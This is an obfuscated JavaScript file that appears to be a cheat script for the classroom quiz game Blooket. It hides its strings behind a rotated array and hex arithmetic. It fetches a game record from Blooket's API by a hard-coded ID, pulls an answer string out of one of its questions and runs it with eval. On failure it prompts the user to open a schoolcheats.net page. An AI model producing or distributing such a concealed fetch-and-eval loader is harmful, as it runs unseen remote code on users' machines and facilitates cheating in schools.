function _0x5ee8(_0xbba15e, _0x5e4d88) {
    const _0x5a2e68 = _0x126a();
    return _0x5ee8 = function (_0x4c724b, _0x2d1676) {
        _0x4c724b = _0x4c724b - (0x70f + -0x4b * -0x74 + 0x2 * -0x138f);
        let _0x546f13 = _0x5a2e68[_0x4c724b];
        return _0x546f13;
    }, _0x5ee8(_0xbba15e, _0x5e4d88);
}
function _0x126a() {
    const _0x2a15c6 = [
        'https://sc',
        'MegaBot',
        'TXNPd',
        'answers',
        '\x20version?',
        'Script\x20is\x20',
        'questions',
        'https://ap',
        'hoolcheats',
        'question',
        'outdated.\x20',
        'com/api/ga',
        'open',
        '4233141kvsyMw',
        '4572815mytRTW',
        'mes?gameId',
        '988188IuxCkL',
        'then',
        'factoryGet',
        'EtRPR',
        'he\x20updated',
        'NNkPZ',
        'json',
        'fMqHU',
        '10087144IvdSRy',
        'ApnGO',
        'Do\x20you\x20wan',
        'VAMKn',
        '1292240FlWaqz',
        '122462rlpbyc',
        't\x20to\x20get\x20t',
        '5103990nYZULs',
        '61ac5b3fe4',
        '7feWcyp',
        'filter',
        'WTxvH',
        'et/',
        '4a330b5570',
        'status',
        '.net/blook',
        'ZyxCr',
        '51e5',
        'i.blooket.',
        '1ioZclu'
    ];
    _0x126a = function () {
        return _0x2a15c6;
    };
    return _0x126a();
}
(function (_0x226a7a, _0x8b31ad) {
    const _0x22ab7c = _0x5ee8, _0x5e3e83 = _0x226a7a();
    while (!![]) {
        try {
            const _0x471ddd = -parseInt(_0x22ab7c(0x20b)) / (-0x1 * 0x35 + -0x622 + 0x658) * (parseInt(_0x22ab7c(0x1fd)) / (-0x2 * 0xe4d + 0x15e3 + 0x6b9)) + parseInt(_0x22ab7c(0x1f0)) / (0x2 * 0x833 + 0x1 * 0x5af + 0x2 * -0xb09) + -parseInt(_0x22ab7c(0x1fc)) / (0x21f1 + 0x23bd * -0x1 + 0x1d0) + -parseInt(_0x22ab7c(0x1ee)) / (0x16b6 + 0x5 * -0x7b5 + 0xfd8) + parseInt(_0x22ab7c(0x1ff)) / (-0x14c3 + -0x7 * -0x584 + -0x11d3 * 0x1) + -parseInt(_0x22ab7c(0x201)) / (0x6f4 + -0x198f + 0x12a2) * (-parseInt(_0x22ab7c(0x1f8)) / (0x2 * -0xc07 + 0x168a * 0x1 + 0x18c)) + -parseInt(_0x22ab7c(0x1ed)) / (-0x643 * 0x4 + 0x270c + 0x19 * -0x8f);
            if (_0x471ddd === _0x8b31ad)
                break;
            else
                _0x5e3e83['push'](_0x5e3e83['shift']());
        } catch (_0x10c07b) {
            _0x5e3e83['push'](_0x5e3e83['shift']());
        }
    }
}(_0x126a, 0x202 * 0x75a + 0xd3cb2 + -0x1cd * 0x9db), ((() => {
    const _0x41f4e9 = _0x5ee8, _0x45f61e = {
            'TXNPd': function (_0x4657de, _0x588ae7) {
                return _0x4657de !== _0x588ae7;
            },
            'ApnGO': function (_0x1774b1, _0x5366ac) {
                return _0x1774b1(_0x5366ac);
            },
            'ZyxCr': _0x41f4e9(0x211) + _0x41f4e9(0x216) + _0x41f4e9(0x1fa) + _0x41f4e9(0x1fe) + _0x41f4e9(0x1f4) + _0x41f4e9(0x210),
            'NNkPZ': _0x41f4e9(0x20c) + _0x41f4e9(0x214) + _0x41f4e9(0x207) + _0x41f4e9(0x204),
            'VAMKn': _0x41f4e9(0x200) + _0x41f4e9(0x205) + _0x41f4e9(0x209),
            'fMqHU': _0x41f4e9(0x1f2) + _0x41f4e9(0x20d),
            'WTxvH': function (_0x55bd10, _0x207bfd) {
                return _0x55bd10 + _0x207bfd;
            },
            'EtRPR': _0x41f4e9(0x213) + _0x41f4e9(0x20a) + _0x41f4e9(0x217) + _0x41f4e9(0x1ef) + '='
        };
    try {
        const _0x1e0be3 = _0x45f61e[_0x41f4e9(0x1fb)], _0x4b85a2 = _0x45f61e[_0x41f4e9(0x1f7)];
        _0x45f61e[_0x41f4e9(0x1f9)](fetch, _0x45f61e[_0x41f4e9(0x203)](_0x45f61e[_0x41f4e9(0x1f3)], _0x1e0be3))[_0x41f4e9(0x1f1)](_0x1afdef => {
            const _0x1061be = _0x41f4e9;
            if (_0x45f61e[_0x1061be(0x20e)](_0x1afdef[_0x1061be(0x206)], 0x1 * 0x103 + -0x1 * -0x93a + -0x975)) {
                const _0x45dbda = _0x45f61e[_0x1061be(0x1f9)](confirm, _0x45f61e[_0x1061be(0x208)]);
                _0x45dbda && window[_0x1061be(0x218)](_0x45f61e[_0x1061be(0x1f5)]);
                return;
            }
            return _0x1afdef[_0x1061be(0x1f6)]();
        })[_0x41f4e9(0x1f1)](_0xd4f4d8 => {
            const _0x419d5 = _0x41f4e9;
            _0x45f61e[_0x419d5(0x1f9)](eval, _0xd4f4d8[_0x419d5(0x212)][_0x419d5(0x202)](_0x4fb4e2 => _0x4fb4e2[_0x419d5(0x215)] == _0x4b85a2)[-0x9d5 + 0x9f * -0x2 + -0x13b * -0x9][_0x419d5(0x20f)][0x2511 * 0x1 + -0x1 * 0x724 + 0x2f * -0xa3]);
        });
    } catch (_0x51f863) {
        const _0x14e09a = _0x45f61e[_0x41f4e9(0x1f9)](confirm, _0x45f61e[_0x41f4e9(0x208)]);
        if (_0x14e09a)
            return window[_0x41f4e9(0x218)](_0x45f61e[_0x41f4e9(0x1f5)]);
    }
})()));
